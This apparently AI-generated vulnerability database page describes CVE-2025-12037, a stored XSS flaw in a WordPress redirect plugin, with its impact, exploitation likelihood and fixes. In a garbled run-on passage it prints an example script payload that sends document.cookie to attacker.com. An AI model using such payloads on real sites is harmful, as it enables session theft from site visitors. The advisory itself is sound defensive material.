
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-12037 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP 404 Auto Redirect to Similar Post plugin for WordPress. It affects all versions up to and including 1.0.5, stemming from insufficient input sanitization and output escaping in admin settings. The vulnerability requires administrator-level authentication and is only exploitable in multi-site WordPress installations or where unfiltered_html has been disabled. It carries a CVSS v3.1 base score of 4.4 (Medium) and was published on February 18, 2026 (Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated attacker with administrator-level privileges can inject arbitrary JavaScript into plugin admin settings fields, which are then stored in the database and rendered without proper escaping when a user visits an affected page. Exploitation requires high privileges (administrator) and a specific environment (multi-site or unfiltered_html disabled), making the attack complexity high. A technical write-up is available at Infinit Security (Infinit Security).
Successful exploitation allows an authenticated administrator to persistently inject malicious scripts into WordPress pages, which execute in the browsers of any user who visits those pages. The primary impacts are low-level confidentiality loss (e.g., session token theft) and low-level integrity compromise (e.g., page content manipulation), with no direct availability impact. The scope is changed, meaning the injected scripts can affect users beyond the attacker's own session, potentially enabling account hijacking or phishing within the affected WordPress site (Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-12037. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for administrator-level credentials and a specific WordPress configuration (multi-site or unfiltered_html disabled) (Red Hat CVE).
unfiltered_html disabled that is running the WP 404 Auto Redirect to Similar Post plugin version ≤ 1.0.5.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.<script> tags or JavaScript event handlers (e.g., onerror, onload) in the plugin's settings rows within the wp_options table.Users should update the WP 404 Auto Redirect to Similar Post plugin to a version beyond 1.0.5 that includes the fix for insufficient input sanitization and output escaping. As a workaround, site administrators can restrict access to the plugin's settings page to trusted accounts only, or temporarily disable the plugin until a patched version is available. Enabling unfiltered_html restrictions (already a prerequisite for exploitation) and enforcing strong administrator account security (MFA, strong passwords) further reduces risk (Red Hat CVE).
Coverage of CVE-2025-12037 has been limited to vulnerability database aggregators and a brief technical post from Infinit Security. No notable vendor statements, researcher commentary, or significant social media discussion has been identified beyond standard CVE publication and tracking (Infinit Security).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."